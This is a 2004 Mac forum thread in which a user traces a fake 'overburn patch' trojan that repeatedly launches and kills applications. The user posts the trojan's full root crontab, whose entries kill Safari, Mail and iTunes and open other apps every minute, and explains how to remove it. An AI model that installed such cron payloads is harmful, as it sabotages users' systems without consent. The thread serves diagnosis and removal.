Welcome to the MacNN Forums.

malique · Dec 23, 2004, 12:00 AM

Hey,

it seems something is kinda making fun of me and I am not sure what it is.

I installed an "overburn patch" (which assured me, it would enable Toast and the Finder to burn 800MB dics � finally) with my admin password and right after that my system went weird: it starts Sherlock, Chess, Netinfo Manager, System Profiler and Calculator EVERY MINUTE or if I let the programs open it will bring them to the front. It quits Safari and is not gone after reboot. I cannot identify it in the Activity Monitor, it won't be so easy. It is not in my startup Prefs.

Is this a known fun-patch? It doesn't seem to do any harm though it is VERY annoying. How do I get rid of it? I can't really google for it w/o a name (found nothing helpful).

Help?

malique · Dec 23, 2004, 02:17 AM

Okay, I got it (thanx, Dragonfly/Arise!)

okay, got it.

slaxx = lamer.

Thsi installer installs a file named "root" here:

/var/cron/tabs/

which does the following:

# DO NOT EDIT THIS FILE - edit the master and reinstall.
# (- installed on Mon Nov 15 00:09:25 2004)
# (Cron version -- $FreeBSD: src/usr.sbin/cron/crontab/crontab.c,v 1.17 2001/06/16 03:16:52 peter Exp $)
* * * * * open -a Calculator
* * * * * open -a Chess
* * * * * open -a "Internet Explorer"
* * * * * kill -KILL `ps -ax | grep "Internet Explorer"`
* * * * * open -a "Internet Explorer"
* * * * * open -a Sherlock
* * * * * open -a "Netinfo Manager"
* * * * * open -a "System Profiler"
* * * * * kill -KILL `ps -ax | grep "Safari"`
* * * * * kill -KILL `ps -ax | grep "Mail"`
15 * * * * kill -STOP `ps -ax | grep "iTunes"`
30 * * * * kill -STOP `ps -ax | grep "iTunes"`
45 * * * * kill -STOP `ps -ax | grep "iTunes"`
59 * * * * kill -STOP `ps -ax | grep "iTunes"`
36 19 * * * kill -KILL `ps -ax | grep "iTunes"`

kill this file and you're done. If once installed it deletes the "root" file out of its own installer package so it can't be found anymore.

�Arise is the 1337.�

Kristoff · Dec 23, 2004, 02:39 AM

And for the record...virus-like activity means that malware can replicate and spred itself.

This is not virus-like. This would be a trojan.

malique · Dec 23, 2004, 02:42 AM

Originally posted by Kristoff:
And for the record...virus-like activity means that malware can replicate and spred itself.

This is not virus-like. This would be a trojan.

You are right. In fact, in the very moment I posted this I wasn't shure what this thing was doing and my Mac had gone wild... it was just an assumption that I installed it. I was pretty sure I wouldn't be the first to know if there REALLY was a virus for OS X. :-)